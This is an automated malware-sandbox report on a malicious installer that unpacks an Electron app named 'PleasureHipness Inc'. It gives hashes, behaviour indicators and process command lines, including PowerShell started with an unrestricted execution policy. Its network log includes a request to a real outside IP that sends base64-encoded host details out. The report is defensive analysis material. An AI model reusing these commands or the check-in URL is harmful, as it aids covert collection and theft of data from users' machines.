File name:

643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe

Full analysis: https://app.any.run/tasks/ddfa821b-5851-4ade-8a3c-df5ee888eca3
Verdict: Malicious activity
Analysis date: December 13, 2024, 19:28:51
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
nodejs
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive, 5 sections
MD5:

297D5CE4DCBAE459987DE91D17DCB9A8

SHA1:

643E5C9F4D04D42375B344B00550BC7ED4D119E6

SHA256:

155D357DEAC165E8EB2750FC63D2BCF34E90095B61772BFF1C20D22435B2262B

SSDEEP:

786432:DgqoMmxuOvaMAZzseQE00KBRXG5Cs4Qnyg:DDoMKuOvaMAZzsmaXG5Cs4Qnv

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executing a file with an untrusted certificate

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)

    • Changes powershell execution policy (Unrestricted)

      • PleasureHipness Inc.exe (PID: 5540)

  • SUSPICIOUS

    • Malware-specific behavior (creating "System.dll" in Temp)

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)

    • Executable content was dropped or overwritten

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)

    • The process creates files with name similar to system file names

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)

    • Drops 7-zip archiver for unpacking

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)

    • Reads security settings of Internet Explorer

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)

    • Process drops legitimate windows executable

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)

    • Starts application with an unusual extension

      • cmd.exe (PID: 4528)

    • Application launched itself

      • PleasureHipness Inc.exe (PID: 5540)

    • Starts CMD.EXE for commands execution

      • PleasureHipness Inc.exe (PID: 5540)

    • The process hides Powershell's copyright startup banner

      • PleasureHipness Inc.exe (PID: 5540)

    • Starts POWERSHELL.EXE for commands execution

      • PleasureHipness Inc.exe (PID: 5540)

    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 4228)

    • The process bypasses the loading of PowerShell profile settings

      • PleasureHipness Inc.exe (PID: 5540)

    • Connects to the server without a host name

      • PleasureHipness Inc.exe (PID: 5540)

  • INFO

    • Checks supported languages

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)
      • PleasureHipness Inc.exe (PID: 5540)
      • PleasureHipness Inc.exe (PID: 5736)
      • chcp.com (PID: 3612)
      • PleasureHipness Inc.exe (PID: 2736)

    • Reads the computer name

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)
      • PleasureHipness Inc.exe (PID: 5540)
      • PleasureHipness Inc.exe (PID: 2736)
      • PleasureHipness Inc.exe (PID: 5736)

    • Create files in a temporary directory

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)

    • The sample compiled with english language support

      • 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe (PID: 5592)

    • Changes the display of characters in the console

      • cmd.exe (PID: 4528)

    • Checks proxy server information

      • PleasureHipness Inc.exe (PID: 5540)

    • Reads the machine GUID from the registry

      • PleasureHipness Inc.exe (PID: 5540)

    • Node.js compiler has been detected

      • PleasureHipness Inc.exe (PID: 5540)
      • PleasureHipness Inc.exe (PID: 2736)
      • PleasureHipness Inc.exe (PID: 5736)

    • The process uses the downloaded file

      • powershell.exe (PID: 5972)
      • powershell.exe (PID: 2084)
      • powershell.exe (PID: 5556)
      • powershell.exe (PID: 4672)
      • powershell.exe (PID: 5892)
      • powershell.exe (PID: 6416)
      • powershell.exe (PID: 6988)
      • powershell.exe (PID: 4992)
      • powershell.exe (PID: 5032)
      • powershell.exe (PID: 5564)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 5972)
      • powershell.exe (PID: 6936)
      • powershell.exe (PID: 5564)
      • powershell.exe (PID: 7008)

    • Sends debugging messages

      • PleasureHipness Inc.exe (PID: 5540)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

ProductVersion: 6.9.6
ProductName: PleasureHipness Inc
LegalTrademarks: PleasureHipness
LegalCopyright: Copyright © 2024 PleasureHipness Inc
FileVersion: 4.6.3
FileDescription: -
CharacterSet: Windows, Latin1
LanguageCode: English (U.S.)
FileSubtype: -
ObjectFileType: Executable application
FileOS: Win32
FileFlags: (none)
FileFlagsMask: 0x0000
ProductVersionNumber: 6.9.6.0
FileVersionNumber: 6.9.6.0
Subsystem: Windows GUI
SubsystemVersion: 4
ImageVersion: 6
OSVersion: 4
EntryPoint: 0x338f
UninitializedDataSize: 16384
InitializedDataSize: 473088
CodeSize: 26624
LinkerVersion: 6
PEType: PE32
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
TimeStamp: 2018:12:15 22:26:14+00:00
MachineType: Intel 386 or later, and compatibles
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
162
Monitored processes
54
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start 643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe pleasurehipness inc.exe cmd.exe no specs conhost.exe no specs chcp.com no specs pleasurehipness inc.exe no specs pleasurehipness inc.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs findstr.exe no specs cmd.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
5592"C:\Users\admin\Desktop\643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe" C:\Users\admin\Desktop\643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
134
Version:
4.6.3
Modules
Images
c:\users\admin\desktop\643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
5540"C:\Users\admin\AppData\Local\Temp\2q4lrrU9xmobPxyZ5U2SfO6o7kS\PleasureHipness Inc.exe" C:\Users\admin\AppData\Local\Temp\2q4lrrU9xmobPxyZ5U2SfO6o7kS\PleasureHipness Inc.exe
643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe
User:
admin
Company:
GitHub, Inc.
Integrity Level:
MEDIUM
Description:
PleasureHipness Inc
Exit code:
134
Version:
4.6.3
Modules
Images
c:\users\admin\appdata\local\temp\2q4lrru9xmobpxyz5u2sfo6o7ks\pleasurehipness inc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\oleaut32.dll
4528C:\WINDOWS\system32\cmd.exe /d /s /c "chcp"C:\Windows\SysWOW64\cmd.exePleasureHipness Inc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
5544\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3612chcpC:\Windows\SysWOW64\chcp.comcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Change CodePage Utility
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\chcp.com
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
5736"C:\Users\admin\AppData\Local\Temp\2q4lrrU9xmobPxyZ5U2SfO6o7kS\PleasureHipness Inc.exe" --type=gpu-process --user-data-dir="C:\Users\admin\AppData\Roaming\boyyyhdgbntaxqtj" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1912 --field-trial-handle=1916,i,6418311846873358346,16920656953182970438,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2C:\Users\admin\AppData\Local\Temp\2q4lrrU9xmobPxyZ5U2SfO6o7kS\PleasureHipness Inc.exePleasureHipness Inc.exe
User:
admin
Company:
GitHub, Inc.
Integrity Level:
LOW
Description:
PleasureHipness Inc
Exit code:
0
Version:
4.6.3
Modules
Images
c:\users\admin\appdata\local\temp\2q4lrru9xmobpxyz5u2sfo6o7ks\pleasurehipness inc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\oleaut32.dll
2736"C:\Users\admin\AppData\Local\Temp\2q4lrrU9xmobPxyZ5U2SfO6o7kS\PleasureHipness Inc.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\admin\AppData\Roaming\boyyyhdgbntaxqtj" --mojo-platform-channel-handle=2200 --field-trial-handle=1916,i,6418311846873358346,16920656953182970438,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8C:\Users\admin\AppData\Local\Temp\2q4lrrU9xmobPxyZ5U2SfO6o7kS\PleasureHipness Inc.exePleasureHipness Inc.exe
User:
admin
Company:
GitHub, Inc.
Integrity Level:
MEDIUM
Description:
PleasureHipness Inc
Exit code:
0
Version:
4.6.3
Modules
Images
c:\users\admin\appdata\local\temp\2q4lrru9xmobpxyz5u2sfo6o7ks\pleasurehipness inc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\oleaut32.dll
4876C:\WINDOWS\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"C:\Windows\SysWOW64\cmd.exePleasureHipness Inc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
5032\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5556powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePleasureHipness Inc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
Total events
104 526
Read events
104 526
Write events
0
Delete events
0

Modification events

No data
Executable files
17
Suspicious files
123
Text files
68
Unknown types
0

Dropped files

PID
Process
Filename
Type
5592643e5c9f4d04d42375b344b00550bc7ed4d119e6.exeC:\Users\admin\AppData\Local\Temp\nst396E.tmp\app-32.7z
MD5:
SHA256:
5592643e5c9f4d04d42375b344b00550bc7ed4d119e6.exeC:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\icudtl.dat
MD5:
SHA256:
5592643e5c9f4d04d42375b344b00550bc7ed4d119e6.exeC:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\LICENSES.chromium.html
MD5:
SHA256:
5592643e5c9f4d04d42375b344b00550bc7ed4d119e6.exeC:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\locales\am.pakpgc
MD5:2009647C3E7AED2C4C6577EE4C546E19
SHA256:6D61E5189438F3728F082AD6F694060D7EE8E571DF71240DFD5B77045A62954E
5592643e5c9f4d04d42375b344b00550bc7ed4d119e6.exeC:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\chrome_100_percent.pakbinary
MD5:ACD0FA0A90B43CD1C87A55A991B4FAC3
SHA256:CCBCA246B9A93FA8D4F01A01345E7537511C590E4A8EFD5777B1596D10923B4B
5592643e5c9f4d04d42375b344b00550bc7ed4d119e6.exeC:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\chrome_200_percent.pakbinary
MD5:4610337E3332B7E65B73A6EA738B47DF
SHA256:C91ABF556E55C29D1EA9F560BB17CC3489CB67A5D0C7A22B58485F5F2FBCF25C
5592643e5c9f4d04d42375b344b00550bc7ed4d119e6.exeC:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\locales\da.pakpgc
MD5:1A53D374B9C37F795A462AAC7A3F118F
SHA256:D0C38EB889EE27D81183A0535762D8EF314F0FDEB90CCCA9176A0CE9AB09B820
5592643e5c9f4d04d42375b344b00550bc7ed4d119e6.exeC:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\locales\en-US.pakbinary
MD5:5E3813E616A101E4A169B05F40879A62
SHA256:4D207C5C202C19C4DACA3FDDB2AE4F747F943A8FAF86A947EEF580E2F2AEE687
5592643e5c9f4d04d42375b344b00550bc7ed4d119e6.exeC:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\locales\ar.pakbinary
MD5:47A6D10B4112509852D4794229C0A03B
SHA256:857FE3AB766B60A8D82B7B6043137E3A7D9F5CFB8DDD942316452838C67D0495
5592643e5c9f4d04d42375b344b00550bc7ed4d119e6.exeC:\Users\admin\AppData\Local\Temp\nst396E.tmp\7z-out\locales\af.pakpgc
MD5:7E51349EDC7E6AED122BFA00970FAB80
SHA256:F528E698B164283872F76DF2233A47D7D41E1ABA980CE39F6B078E577FD14C97
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
25
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5540
PleasureHipness Inc.exe
GET
200
79.133.46.35:80
http://79.133.46.35/call.php?api=register&username=dXNlcg==&userdata=NCBHQl9bb2JqZWN0IE9iamVjdF1fTWljcm9zb2Z0IEJhc2ljIERpc3BsYXkgQWRhcHRlcl9mYWxzZV8xMjgweDcyMF9XaW5kb3dzIDEwIEVudGVycHJpc2VfMjIgbWludXRlcyAoMC4zOCBob3VycylfQzpcVXNlcnNcYWRtaW5fREVTS1RPUC1KR0xMSkxEX2FkbWluX1dpbmRvd3NfTlRfaWEzMl8xMC4wLjE5MDQ1X0M6XFVzZXJzXGFkbWluXEFwcERhdGFcUm9hbWluZ19DOlxVc2Vyc1xhZG1pblxBcHBEYXRhXExvY2FsXFRlbXBfREVTS1RPUC1KR0xMSkxEX19BTUQ2NCBGYW1pbHkgNiBNb2RlbCAxNCBTdGVwcGluZyAzLCBBdXRoZW50aWNBTURfeDg2X0M6XzRfQzpcVXNlcnNcYWRtaW5cQXBwRGF0YVxMb2NhbFxUZW1wXDJxNGxyclU5eG1vYlB4eVo1VTJTZk82bzdrU1xQbGVhc3VyZUhpcG5lc3MgSW5jLmV4ZQ==
unknown
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
142.250.184.196:443
https://www.google.com/
unknown
html
18.3 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
2.23.209.161:443
www.bing.com
Akamai International B.V.
GB
whitelisted
192.168.100.255:138
whitelisted
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5540
PleasureHipness Inc.exe
142.250.184.196:443
www.google.com
GOOGLE
US
whitelisted
5540
PleasureHipness Inc.exe
79.133.46.35:80
diva-e Datacenters GmbH
DE
unknown

DNS requests

Domain
IP
Reputation
www.bing.com
  • 2.23.209.161
  • 2.23.209.177
  • 2.23.209.182
  • 2.23.209.189
  • 2.23.209.150
  • 2.23.209.158
  • 2.23.209.176
  • 2.23.209.187
  • 2.23.209.179
whitelisted
google.com
  • 172.217.18.110
whitelisted
crl.microsoft.com
  • 2.16.241.12
  • 2.16.241.19
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
www.google.com
  • 142.250.184.196
whitelisted
self.events.data.microsoft.com
  • 51.105.71.136
whitelisted

Threats

No threats detected
Process
Message
PleasureHipness Inc.exe
<--- Last few GCs ---> [5540:5B104000] 41071 ms: Mark-Compact 1001.8 (1043.1) -> 1001.1 (1043.1) MB, 2547.00 / 0.00 ms (average mu = 0.222, current mu = 0.018) allocation failure; scavenge might not succeed [5540:5B104000] 43711 ms: Mark-Compact 1008.9 (1043.1) -> 1008.2 (1058.1) MB, 2641.00 / 0.00 ms (average mu = 0.110, current mu = 0.000) allocation failure; scavenge might not succeed
PleasureHipness Inc.exe
<--- JS stacktrace --->
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
643e5c9f4d04d42375b344b00550bc7ed4d119e6.exe